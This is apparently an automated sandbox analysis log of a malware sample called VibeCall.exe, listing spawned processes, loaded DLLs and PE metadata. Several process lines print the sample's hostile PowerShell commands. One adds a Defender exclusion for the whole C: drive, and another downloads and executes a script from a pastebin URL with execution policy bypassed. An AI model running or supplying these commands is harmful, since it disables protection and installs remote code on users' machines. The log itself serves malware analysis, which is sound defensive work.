                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 628
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2892 -s 136
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 252
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 480
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: icu.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshunix.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Source: VibeCall.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VibeCall.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: VibeCall.exeStatic file information: File size 71217328 > 1048576
                      Source: VibeCall.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
                      Source: VibeCall.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
                      Source: VibeCall.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: n=4.pDbZ source: powershell.exe, 0000000C.00000002.2279960715.000001A65A6A5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp
